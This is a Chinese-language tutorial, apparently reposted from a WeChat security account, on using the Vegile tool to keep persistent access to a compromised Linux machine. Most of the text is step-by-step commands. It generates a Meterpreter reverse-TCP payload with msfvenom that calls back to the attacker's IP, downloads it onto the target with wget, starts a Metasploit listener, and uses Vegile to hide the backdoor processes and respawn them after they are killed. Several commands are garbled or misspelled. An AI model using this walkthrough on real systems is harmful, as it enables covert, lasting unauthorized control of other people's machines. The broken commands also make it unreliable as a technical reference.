Vegile-加壳幽灵
-
工具介绍
-
项目地址
-
工具使用
-
模拟实验
-
使用心得
-
工具介绍
Vegile是用于linux系统后渗透测试中的权限维持。Vegile这个工具将设置一个后门/rootkit,并且这个后门会直接隐藏spesisifc进程,无限连接metesploit,持续维持你的Metepreter会话,即使木马进程被杀死,它依然会再次重新运行,换句话说是该进程无限循环的。
-
项目地址
幽灵
-
[1] 第一步:在靶机上clone下工具
git clone https://github.com/Screetsec/Vegile.git
第二步:在攻击机生成Payload
msfVENOM -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=自
定义监听端口 -b "x80" -f elf -o test
第三步:攻击机启动Apache,靶机上下载Payload
servie apache2 start cp test /var/www/html weget 攻击机IP/test
[4]启动Metasploit,开启监听
msfconsoleuse explot/multi/handerset lhost 监听ip 我这里是192.168.8.158s
et lport 监听端口 我这里是8888exploit -j
[5] 构造后门
chmod +x testchmod +x Vegile 赋予权限
查看帮助
/Vegile --h./Vegile --i 隐藏你的后门./Vegile --u 无限复制你的metasploi
t会话,即使他被kill,依然可以再次运行
植入后门
Vegile --u test 这里填msfvenom生成的木马名字这里可以看到已经反弹会话了,我们kill掉
sessions -k 7
exploit -j 重新监听
Vegile隐藏的两个后门进程分别是screetsec、tracer
ps -aux | grep tracer kill 25856ps -aux
发现我们kill进程后,又会生成新的进程,以此达到持续控制。
再回头看Parrot中的会话是否可以反弹
-
[6] 使用心得
-
木马一定要放在Vegile目录下 ;
-
Vegile一般用于维持meterpreter会话;
本文始发于微信公众号(疯猫网络):Vegile-加壳幽灵
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论